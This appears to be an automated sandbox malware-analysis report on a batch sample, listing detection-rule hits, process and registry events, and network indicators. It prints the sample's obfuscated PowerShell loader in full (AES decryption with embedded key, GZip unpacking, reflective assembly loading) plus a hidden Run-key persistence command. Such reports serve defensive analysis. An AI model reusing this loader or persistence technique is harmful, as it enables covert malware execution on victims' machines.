'$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'
+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+'
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+
[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+'
Source: Process started Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4828, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 4556, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/
Source: File created Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1284, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key set Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: File created Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1284, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Script Block Logging Author: frack113: Data: EventID: 4104, MessageNumber: 1, MessageTotal: 1, Path: , ScriptBlockId: 0ed46015-449a-42c0-83e2-dd1400a3f7e4, ScriptBlockText: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , Source: Microsoft-Windows-PowerShell, data0: 1, data1: 1, data2: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , data3: 0ed46015-449a-42c0-83e2-dd1400a3f7e4, data4:
Source: Registry Key set Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2844, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6332, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 1284, ProcessName: powershell.exe
No Suricata rule has matched
AV Detection

Source: 1.cmd Virustotal: Detection: 14%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,
Source: C:\Windows\System32\cmd.exe Code function: 19_2_000002241390D894 FindFirstFileExW,
Source: C:\Windows\System32\cmd.exe Code function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\cmd.exe Code function: 19_2_000002241393D894 FindFirstFileExW,
Source: C:\Windows\System32\cmd.exe Code function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000002BCD7E3D894 FindFirstFileExW,
Source: C:\Windows\System32\conhost.exe Code function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exe Code function: 37_2_0000026504EAD894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000025DC1ACD894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000025DC1CED894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_00000225DC64D894 FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_00000225DC67D894 FindFirstFileExW,
Source: C:\Windows\System32\lsass.exe Code function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\lsass.exe Code function: 40_2_00000202C0AED894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe Code function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exe Code function: 41_2_000002A66130D894 FindFirstFileExW,
Source: C:\Windows\System32\dwm.exe Code function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dwm.exe Code function: 42_2_000002BAAEDCD894 FindFirstFileExW,
Source: C:\Windows\System32\dwm.exe Code function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dwm.exe Code function: 42_2_000002BAAEE4D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe Code function: 43_2_0000026A879CD894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe Code function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exe Code function: 43_2_0000026A87F4D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe Code function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exe Code function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exe Code function: 44_2_00000179537AD894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe Code function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exe Code function: 44_2_00000179537DD894 FindFirstFileExW,
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 45_2_0000016CE653D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exe Code function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exe Code function: 46_2_000002295D56D894 FindFirstFileExW,
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: azure-winsecure.com
Source: Microsoft-Windows-LiveId%4Operational.evtx.50.dr String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co9=
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xGx
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
